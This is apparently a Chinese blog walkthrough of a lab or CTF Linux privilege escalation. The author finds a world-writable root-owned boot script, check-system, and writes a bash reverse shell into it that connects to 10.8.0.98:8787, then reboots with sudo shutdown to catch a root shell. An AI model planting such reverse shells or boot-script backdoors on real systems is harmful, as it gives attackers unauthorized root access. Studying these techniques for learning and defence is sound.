首页 > 系统相关 >【Linux提权】check-system文件

【Linux提权】check-system文件

时间:2024-08-24 15:37:14浏览次数:11  
标签:文件 systemd system 提权 root check

【此次省略一万字.........】

成功突破边界!

提权:
看了sudo -l,发现一个shutdown命令可以,但是这名字应该是重启吧。。。先跑一跑linpeas.sh,试了一下跑出来的CVE,没有成功

找一找具有root命令并且我们可以写权限的文件:

find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"

这个命令的目的是查找所有属于 root 用户的、具有写权限的、并且可以被任何用户执行的文件,但排除 /proc 目录中的内容

发现了check-system文件,看了一下内容:

查看资料:

系统启动时启动的程序由systemd , 系统和服务管理器控制。systemd是启动时运行的第一个进程。它始终具有进程ID (PID)1。计算机中正在运行的所有其他进程都是由systemd启动的,或者由systemd已经启动的进程启动。

那就有可能,我们需要以sudo命令运行刚刚上面的shutdown命令,在这个check-system文件里面写入反弹shell脚本,这样系统重启的时候,我们就拿到root提权:

vim.tiny /usr/bin/check-system

(这里有坑,我用find / -perm -u=s -type f 2>/dev/null这个命令找不到vim.tiny,但是它又是存在的,如果直接用vi编辑check-system文件,那就各种BUG,编辑不了,用vim.tiny就可以)

bash -i >& /dev/tcp/10.8.0.98/8787 0>&1;
sudo shutdown -r

等待命令弹回来

标签:文件,systemd,system,提权,root,check
From: https://www.cnblogs.com/o-O-oO/p/18377831

相关文章

  • 利用子域的System权限通往父域
    前言最近翻阅笔记发现一篇文章提到通过子域的System权限可以突破获取到父域权限,本文将对此技术进行尝试复现研究。利用分析环境信息:子域:187、sub.cs.org父域:197、cs.org首先通过在子域的域控机器上打开mmc.exe->连接ADSI->配置来查看子域的配置命名上下文:从配置中可以看......
  • datacheck安装
    datacheck安装1.运行环境DataCheck运行环境要求:Python版本:3.7及以上版本。数据库:目前支持PostgreSQL、SybaseASE、Oracle。操作系统:要求Debian10+、Ubuntu16.04+、SLES12SP5和15SP3或CentOS/RHEL7+/KyLin10。2.安装/升级⚠️注意:使用前检查当前版本......
  • Robot Operating System——使用VSCode调试ROS2代码
    大纲安装插件/组件VSCode插件调试组件自定义cmake命令配置CMakeTools新增CMakePresets.json修改默认的cmake编译Debug版配置测试环境启动测试总结参考资料工欲善其事必先利其器。直接使用GDB调试代码毕竟不是很方便,我们将探索如何使用VSCode调试ROS2的代码。我们......
  • SpringBoot 用的 spring-jcl 打印日志,与 LoggingSystem 有鸡毛关系?
    开心一刻现实中,我有一个异性游戏好友,昨天我心情不好,找她聊天我:我们两个都好久没有坐下来好好聊天了她:你不是有女朋友吗我:人家不需要我这种穷人啊她:难道我需要吗前情回顾从源码分析SpringBoot的LoggingSystem→它是如何绑定日志组件的从源码的角度讲述了SpringBoot......
  • Qt Line Edit焦点丢失|Checkbox转移焦点丢失
    在我设计的一个界面中,用事件过滤器获取键盘方向键,通过键盘方向键转移控件的焦点,获取焦点的控件显示高亮,在从一个Checkbox控件转移焦点到一个LineEdit控件的时候,该获得焦点的控件并没有显示高亮,并且根据后续操作推测焦点消失了,通过qDebug调试发现转移焦点后的那一瞬间,LineEdit控......
  • IDEA中使用git合并分支的过程报错:cant checkout because of unmerged files
    使用idea的git插件控制代码分支合并时,由于操作不当,报错了,控制台报错如下:cantcheckoutbecauseofunmergedfiles,youhavetoresolveallmergeconflictsbeforecheckout.仔细回想报错的起因,经过大概是这样的:首先,远程仓库里面的代码版本是很老了,而本地的代码版......
  • Spyglass cdc check报的errors
    1.report clocksignalsconvergingonamuxslave_adc是在mclk下进行同步,adc_bclk_i则是来自外部,因此切换bclk可能导致毛刺。可以通过切换之前先关闭后级的相关模块。 2.flagsaclocksinalwhosemulti-fanoutsconverge不太清楚要不要解决3.Ac_unsync01(3):Check......
  • 多模态学习之论文阅读:《Systematic comparison of deep-learning based fusion strate
    《Systematiccomparisonofdeep-learningbasedfusionstrategiesfor multi-modal ultrasoundindiagnosisof liver cancer》 -2024.10 NEUROCOMPUTING 影响因子7.9(一)多模态数据构成研究设计了“病变配对”方法来构建数据集,包括B模式超声、剪切波弹性成像(SWE)和......
  • 从源码分析 SpringBoot 的 LoggingSystem → 它是如何绑定日志组件的
    开心一刻今天心情不好,想约哥们喝点我:心情不好,给你女朋友说一声,来我家,过来喝点哥们:行!我给她说一声我:你想吃啥?我点外卖哥们:你俩定吧,我已经让她过去了我:???我踏马让你过来!和她说一声哥们:哈哈哈,我踏马寻思让她过去呢前情回顾SpringBoot2.7霸王硬上弓Logback1.3→不甜但解渴......
  • CVSS(Common Vulnerability Scoring System)打分规则解读
    CVSS(CommonVulnerabilityScoringSystem)提供了一种根据漏洞的主要特征进行打分,反映其严重性的方法。CVSS已成为被广泛使用的标准。下面是CVSS3.1版本计算器的界面截图,本文对BaseScore的打分标准做解读,并提供一些建议。同时会对每个维度选项做翻译。 AttackVector攻击向......